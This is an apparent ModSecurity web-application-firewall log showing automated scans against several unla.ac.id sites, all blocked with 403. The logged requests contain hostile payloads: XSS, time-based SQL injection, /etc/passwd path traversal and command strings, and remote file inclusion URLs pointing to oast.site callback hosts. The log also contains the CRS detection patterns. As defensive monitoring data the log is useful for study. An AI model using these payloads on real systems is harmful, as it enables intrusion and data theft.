[Tue Aug 29 11:41:57.425866 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:score. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:score: 2134\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO13FcCo-f0AAAdV7XgAAAAa"]
[Tue Aug 29 11:41:57.428534 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:score. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:score: 2134\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO13FcCo-f0AAAcvBhMAAAAJ"]
[Tue Aug 29 11:41:57.432981 2023] [:error] [pid 1871] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:score. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:score: 2134\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO13FcCo-f0AAAdPLv4AAAAT"]
[Tue Aug 29 11:41:57.487224 2023] [:error] [pid 1871] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:score. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:score: 2134\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO13FcCo-f0AAAdPLwAAAAAT"]
[Tue Aug 29 11:41:57.522520 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13FcCo-f0AAAdUcxQAAAAZ"]
[Tue Aug 29 11:41:58.374944 2023] [:error] [pid 1871] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:score. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:score: 2134\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO13FsCo-f0AAAdPLwIAAAAT"]
[Tue Aug 29 11:41:58.412294 2023] [:error] [pid 1881] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:rsvp_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:rsvp_id: (select(0)from(select(sleep(5)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-json/rsvpmaker/v1/stripesuccess/anythinghere"] [unique_id "ZO13FsCo-f0AAAdZZnoAAAAf"]
[Tue Aug 29 11:41:58.421872 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:rsvp_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:rsvp_id: (select(0)from(select(sleep(5)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-json/rsvpmaker/v1/stripesuccess/anythinghere"] [unique_id "ZO13FsCo-f0AAAc@cVAAAAAL"]
[Tue Aug 29 11:41:59.677415 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:rsvp_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:rsvp_id: (select(0)from(select(sleep(5)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-json/rsvpmaker/v1/stripesuccess/anythinghere"] [unique_id "ZO13F8Co-f0AAAdECZIAAAAW"]
[Tue Aug 29 11:41:59.682939 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:rsvp_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:rsvp_id: (select(0)from(select(sleep(5)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-json/rsvpmaker/v1/stripesuccess/anythinghere"] [unique_id "ZO13F8Co-f0AAAQSWxAAAAA0"]
[Tue Aug 29 11:41:59.812541 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:rsvp_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:rsvp_id: (select(0)from(select(sleep(5)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-json/rsvpmaker/v1/stripesuccess/anythinghere"] [unique_id "ZO13F8Co-f0AAAc@cVUAAAAL"]
[Tue Aug 29 11:41:59.813557 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:rsvp_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:rsvp_id: (select(0)from(select(sleep(5)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-json/rsvpmaker/v1/stripesuccess/anythinghere"] [unique_id "ZO13F8Co-f0AAAc92u4AAAAD"]
[Tue Aug 29 11:42:00.377699 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gjo4rf4rg59kwa.oast.site/hqbq.txt found within TX:1: cjmnbitjmimt14dgn26gjo4rf4rg59kwa.oast.site/hqbq.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/plugins/ueditor/php/controller.php"] [unique_id "ZO13GMCo-f0AAAc36yIAAAAO"]
[Tue Aug 29 11:42:00.378074 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gnq46k4e9jbya7.oast.site/hqbq.txt found within TX:1: cjmnbitjmimt14dgn26gnq46k4e9jbya7.oast.site/hqbq.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/plugins/ueditor/php/controller.php"] [unique_id "ZO13GMCo-f0AAAdUcxwAAAAZ"]
[Tue Aug 29 11:42:00.387535 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g4amig7613yy6j.oast.site/hqbq.txt found within TX:1: cjmnbitjmimt14dgn26g4amig7613yy6j.oast.site/hqbq.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/plugins/ueditor/php/controller.php"] [unique_id "ZO13GMCo-f0AAAcoNgIAAAAF"]
[Tue Aug 29 11:42:00.392136 2023] [:error] [pid 1880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g5x7f8oe5uja5c.oast.site/hqbq.txt found within TX:1: cjmnbitjmimt14dgn26g5x7f8oe5uja5c.oast.site/hqbq.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/ueditor/php/controller.php"] [unique_id "ZO13GMCo-f0AAAdYA@sAAAAe"]
[Tue Aug 29 11:42:00.453747 2023] [:error] [pid 1865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gyo3imp1wxkj1u.oast.site/hqbq.txt found within TX:1: cjmnbitjmimt14dgn26gyo3imp1wxkj1u.oast.site/hqbq.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/plugins/ueditor/php/controller.php"] [unique_id "ZO13GMCo-f0AAAdJqRIAAAAC"]
[Tue Aug 29 11:42:01.359380 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:controller: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13GcCo-f0AAAdV7YQAAAAa"]
[Tue Aug 29 11:42:01.360922 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:controller: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13GcCo-f0AAAdSZJEAAAAX"]
[Tue Aug 29 11:42:01.382259 2023] [:error] [pid 1865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:controller: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13GcCo-f0AAAdJqRMAAAAC"]
[Tue Aug 29 11:42:01.390251 2023] [:error] [pid 1855] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gqm1i4mcrb4hzg.oast.site/hqbq.txt found within TX:1: cjmnbitjmimt14dgn26gqm1i4mcrb4hzg.oast.site/hqbq.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/plugins/ueditor/php/controller.php"] [unique_id "ZO13GcCo-f0AAAc-5yEAAAAN"]
[Tue Aug 29 11:42:01.407622 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:controller: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13GcCo-f0AAAdUcyAAAAAZ"]
[Tue Aug 29 11:42:01.408192 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:controller: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13GcCo-f0AAAdECZcAAAAW"]
[Tue Aug 29 11:42:02.515243 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:controller: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13GsCo-f0AAAdQ3doAAAAV"]
[Tue Aug 29 11:42:04.375257 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:cat /etc/passwd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/command.cgi"] [unique_id "ZO13HMCo-f0AAAdb7g8AAAAb"]
[Tue Aug 29 11:42:04.376898 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:cat /etc/passwd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/command.cgi"] [unique_id "ZO13HMCo-f0AAAdQ3d0AAAAV"]
[Tue Aug 29 11:42:04.384864 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:cat /etc/passwd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/command.cgi"] [unique_id "ZO13HMCo-f0AAAdOeOwAAAAS"]
[Tue Aug 29 11:42:04.385914 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:cat /etc/passwd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/command.cgi"] [unique_id "ZO13HMCo-f0AAAc92vYAAAAD"]
